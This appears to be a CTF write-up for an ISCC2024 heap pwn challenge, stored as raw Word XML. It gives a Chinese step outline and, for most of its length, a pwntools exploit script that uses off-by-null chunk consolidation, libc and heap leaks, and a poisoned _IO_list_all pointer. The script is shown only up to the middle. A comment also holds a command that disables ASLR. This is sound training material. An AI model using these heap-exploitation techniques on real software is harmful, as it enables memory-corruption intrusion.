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BCF22" w14:textId="399E2DC3" w:rsidR="00E2294C" w:rsidRDefault="00477DCF" w:rsidP="00477DCF">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ISCC2024 WriteUp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280FEA1B" w14:textId="77777777" w:rsidR="002067AD" w:rsidRDefault="002067AD" w:rsidP="002067AD">
      <w:r w:rsidRPr="001B495D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="001B495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hooops+李卓航+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>925798691@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BA3AD0" w14:textId="5D981867" w:rsidR="00477DCF" w:rsidRDefault="00477DCF" w:rsidP="002067AD">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwn+ea</w:t>
      </w:r>
      <w:r w:rsidR="00EF0E29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yheap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A8A135" w14:textId="5773599A" w:rsidR="00477DCF" w:rsidRDefault="00477DCF" w:rsidP="002067AD">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083E2D14" w14:textId="2CCE86FA" w:rsidR="00477DCF" w:rsidRDefault="00477DCF" w:rsidP="00477DCF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在off by null洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51973E8A" w14:textId="217614D6" w:rsidR="00477DCF" w:rsidRDefault="00504B2C" w:rsidP="00477DCF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A0A09E4" wp14:editId="7E2A59D9">
            <wp:extent cx="3619686" cy="1549480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1298614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14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8EEF" w14:textId="77777777" w:rsidR="002067AD" w:rsidRDefault="00477DCF" w:rsidP="00477DCF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪造chunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8A5217" w14:textId="77777777" w:rsidR="002067AD" w:rsidRDefault="00477DCF" w:rsidP="00477DCF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改previnuse字段为0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B993D5" w14:textId="77777777" w:rsidR="002067AD" w:rsidRDefault="00477DCF" w:rsidP="00477DCF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发合并</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8CED2B" w14:textId="77777777" w:rsidR="002067AD" w:rsidRDefault="00477DCF" w:rsidP="00477DCF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造UAF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E6F892" w14:textId="77777777" w:rsidR="002067AD" w:rsidRDefault="00477DCF" w:rsidP="00477DCF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打IO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B83511" w14:textId="02DAE251" w:rsidR="00477DCF" w:rsidRDefault="00477DCF" w:rsidP="00477DCF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用house of cat直接调用ROP链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39922FD5" w14:textId="287B4F33" w:rsidR="00477DCF" w:rsidRDefault="00477DCF" w:rsidP="002067AD">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC465D4" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 禁用地址空间布局随机化 (ASLR) 以便于调试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22835733" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># sudo sysctl -w kernel.randomize_va_space=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B509A2" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="733F57FA" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>from pwn import *  # 导入pwntools库，用于漏洞利用开发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601F00A3" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>from Crypto.Util.number import long_to_bytes, bytes_to_long  # 导入Cryptography库中的实用函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20685FEF" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="5F350AD2" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 设置调试日志级别为 'debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ED0092" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>context.log_level = 'debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3B9231" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="5B6441A2" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 设置二进制文件的体系结构和操作系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3036C9FB" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>context(arch='amd64', os='linux')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EF6BC3" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="3C05FFEA" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 设置调试终端为 tmux 的水平分屏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D37994F" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>context.terminal = ['tmux', 'splitw', '-h']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69015BB7" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="74286A85" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 目标程序的路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8B77DC" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>pwn = './CAT_DE'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A822363" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>e = ELF(pwn)  # 读取目标程序的ELF文件，便于获取符号信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D947F74" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="74EA73F5" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 切换到目标程序所在的目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616F70B8" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>os.chdir(pwn[:pwn.rfind('/')])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B442048" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="4F97310A" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 指定libc库的路径并读取其ELF文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76412006" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>libcpath = './libc.so.6'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B768CC0" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>libc = ELF(libcpath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E028448" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="51999286" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 启动目标程序的进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B970CC1" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>p = process(pwn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD0F512" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="37568CC8" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 定义辅助函数，进行地址混淆操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6394F3" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>def ptrxor(pos, ptr):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D55DBE9" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    return p64((pos &gt;&gt; 12) ^ ptr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E244E0" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="607906F0" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 定义命令选择函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0BFC8F" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>def cmd(idx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE4BC7C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p.recvuntil("input your car choice &gt;&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1FC646" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p.sendline(str(idx))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2406547B" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="21E3BFA3" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 定义增加项目的函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393B9899" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>def add(size, content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E59EAE4" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    cmd(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A950758" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p.recvuntil("size:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62477EA1" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p.sendline(str(size))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD1C126" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p.recvuntil("content:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EBC6C3" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p.send(content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38351FB3" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="690DEF57" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 定义删除项目的函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A3CA39" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>def dele(idx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6491E2F1" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    cmd(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC2984" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p.recvuntil("idx:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C91915C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p.sendline(str(idx))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4782392F" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="69D893D8" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 定义显示项目的函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ACA228" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>def show(idx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD5A675" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    cmd(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685FACBF" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p.recvuntil("idx:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3972F7D9" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p.sendline(str(idx))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9B1F38" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="7C096395" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 定义编辑项目的函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3E4CD5" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>def edit(idx, content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64164B0A" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    cmd(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4649994C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    p.recvuntil("idx:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108ACA36" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p.sendline(str(idx))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C25AD" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p.recvuntil("content:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BE3032" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t xml:space="preserve">    p.send(content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4BB98C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="7319D8FE" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 添加项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A67DC3" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x500, 'a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B33747D" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x100, 'a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7008A04C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x500, 'a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA68FE" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x100, 'a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429A829C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="3C916633" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 删除项目以制造漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A8FF7" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>dele(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D41BD9C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>dele(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E14036E" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="40D4733E" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 再次添加项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3155FB06" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x500, 'a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8BE56D" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>show(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ED750A" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="77AFF6CB" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 获取libc和堆的基地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349BB4D2" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>p.recvuntil("context:\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474A57E" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>libcbase = u64(p.recv(8)) - 0x219c00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FDBE60" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>heapbase = u64(p.recv(8)) - 0x290</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367D160F" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="77C4053A" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 添加伪造的项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360982B9" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x500, 'flag\x00')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E8C867" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>IO_list_all = libcbase + 0x21a680</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5CDF0C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x508, 'a')  # 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE5C212" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x4f0, 'a')  # 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38533057" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x500, 'a')  # 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72408F" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x100, 'a')  # 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C23AEAD" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="3FF0FEEF" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 创建伪造的堆块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B70F9BB" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>fake_chunk = heapbase + 0x11e0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58294BC8" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>pay1 = 0x300 * b'\x00' + p64(0) + p64(0x201) + p64(fake_chunk) + p64(fake_chunk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434D111F" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>pay1 = pay1.ljust(0x500, b'\x00') + p64(0x200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E96A774" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="74A2FB22" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 编辑项目以注入伪造的堆块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B893A11" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>edit(4, pay1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A857B9C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>dele(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE3FCEA" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x100, 'a')  # 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A96C5" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>add(0x500, 'a')  # 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A26BD7C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8"/>
    <w:p w14:paraId="4B40278C" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t># 删除并再次添加项目以触发漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739F61B" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>dele(7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A35842" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>dele(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667D858F" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>pay1 = 0x300 * b'\x00' + p64(0) + p64(0x111) + ptrxor(fake_chunk + 0x10, IO_list_all) + p64(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7879B7E1" w14:textId="77777777" w:rsidR="00B00CB8" w:rsidRDefault="00B00CB8" w:rsidP="00B00CB8">
      <w:r>
        <w:t>pay1 = pay1.ljust(0x500, b'\x00') + p64(0x200)</w:t>
      </w:r>
    </w:p>
